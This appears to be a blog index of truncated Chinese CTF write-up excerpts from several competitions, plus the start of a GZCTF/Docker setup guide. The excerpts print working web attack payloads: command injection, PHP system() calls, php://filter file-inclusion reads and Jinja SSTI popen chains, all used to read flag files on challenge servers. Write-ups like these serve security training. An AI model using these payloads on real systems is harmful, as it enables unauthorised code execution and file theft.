NepCTF-WP
JavaSeri签到题,借这个题顺便解决了哈shiro框架工具不能正常使用的历史遗留问题,最后发现java版本1.8.0_321能够正常使用 这个题登录之后看到熟悉的rememberMe,直接工具一把梭,爆破密钥加爆破利用链及回显再执行命令就行了 flag{e22d3fa1-4a94-1155-e387-9b8744455d70} easyGooGooVVVY参考ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 - twsec -...
0xGame-WP
2024ez_login弱口令直接爆破即可,admin/admin123 0xGame{It_Is_Easy_Right?} ez_rcefrom flask import Flask, requestimport subprocessapp = Flask(__name__)@app.route("/")def index(): return open(__file__).read()@app.route("/calc", methods=['POST'])def calculator(): expression = request.form.get('expression') or "114 1000 * 514 + p" result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True) ...
L3HCTF-WP
best_profile先分析源码,发现在app.py中存在如下代码 @app.route("/get_last_ip/<string:username>", methods=["GET", "POST"])def route_check_ip(username): if not current_user.is_authenticated: return "You need to login first." user = User.query.filter_by(username=username).first() if not user: return "User not found." return render_template("last_ip.html", last_ip=user.last_ip)geoip2_reader =...
MOVECTF-WP
RCELABS-0 flag{3s2wvash-ps8i-42r-8idu-29lukzyaulna} RCELABS-1a=system("tac /flag"); flag{jrifs3wu-dsqq-4hr-8pmw-lojok3hevw9a} RCELABS-2GET:action=submitPOST:content=system("cat /flag") flag{qicmdfa6-qphh-4rz-8dze-uyq1k5icrha5} RCELABS-3a=cat /flag flag{x88vasgf-jsvy-4ga-8mlb-wbot5g7mh20c} RCELABS-4ip=127.0.0.1;cat /flag flag{sy2wwv2g-fk61-47z-8pic-m2uof4pfi7ko} RCELABS-5cmd=cat...
奇奇怪怪的教程
前言前天搭GZ台子的时候看了很多教程,也踩了很多坑,所以就想记录下自己的安装步骤 一.GZCTF搭建及web环境搭建1.docker安装(Windows)1.1docker下载英文版下载地址:Docker: Accelerated Container Application Development 汉化版下载地址:Release 4.42.0 · asxez/DockerDesktop-CN 如果下载汉化版,还要下载配置文件,到c盘中的安装路径(默认路径安装的话就为C:\Program Files\Docker\Docker\frontend\resources),替换原来的配置文件即可,原配置文件应该是appxxxx.asar这个名字 下载后安装的时候似乎没有其他多余选项了,直接下一步就行,但是路径目前不知道怎么修改,只有装在c盘 安装完成后重启电脑就行 1.2docker配置首次进入docker会要求登录账户,可以注册一个Docker hub的账户,也可以跳过 然后就去更换拉取的镜像源,默认是从Docker...
BUUCTF靶场
前言新开个靶场接着刷题,极客大挑战已经做过的就跳了,参考极客大挑战-WP | Yxing [ACTF2020 新生赛]Include根据tips中的文件包含直接伪协议 GET:file=php://filter/read=convert.base64-encode/resource=flag.php flag{99cbe927-0326-4ad0-9cbb-0d524fef23e3} [HCTF 2018]WarmUp源码提示source.php,直接访问,源码发现hint.php,也直接访问 //source.php<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist =...
CMCTF-WP
WEBpop<?phpclass A1{ public $a1;}class A2{ public $a2 = '10086';}class A3{ public $a3;}class A4{ public $a4;}$a=new A1();$a->a1=new A2();$a->a1->a2=new A3();$a->a1->a2->a3=new A4();echo...
HNCTF-WP
WEBDeceptiFlag看到隐藏元素,而且提示拼音,分别输xiyangyang,huitailang进入tips.php cookie中发现flag位置为/var/flag/flag.txt,随便尝试几个路径包含发现都不行,伪协议读取成功 //file=php://filter/read=convert.base64-encode/resource=tips.php//tips.php<?phpsession_start();// 为 PHP 7 添加 str_starts_with 函数兼容支持if (!function_exists('str_starts_with')) { function str_starts_with($haystack, $needle) { return strpos($haystack, $needle) === 0; }}if (!isset($_SESSION['verified']) ||...
LitCTF-WP
猫猫黑客小分队-yxing,mintlovectf,zhaowumian-42名 WEB星愿信箱尝试后发现是SSTI,但是过滤了{{}},用{%print%}绕过就行 {%print lipsum.__globals__.get('os').popen('tac /flag').read()%} NSSCTF{4a1bc0ff-4184-4832-8294-10b7838b30f2} nest_js参考漏洞预警 | Next.js 中间件鉴权绕过漏洞 (CVE-2025-29927) |...
米好信安挑战赛&黄河流域挑战赛-WP
米好信安挑战赛WEB1 尝试发现过滤__base__、单引号。旁路注入就行 GET:a=popen&b=tac+/flagPOST:content={{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}} flag{45f262f8515a42a85400321eccae7f0b} CRYPTO2先爆破密码得到密码为123456 我们截获到了一段密文:zhq rop sb lpgh mcqm cit tab。 已知以下条件: 使用的型号为 M3。 接线板设置为:ab cd ef gh ij kl mn op qr st。 反射器使用的是 UKW-B。 反射器的位置设置为 3,环设置为 5。 三个转子的设置分别为: ○ 第一个转子:rotor1 为 II,位置(position1)为 4,环(ring1)为 6。 ○ 第二个转子:rotor2 为...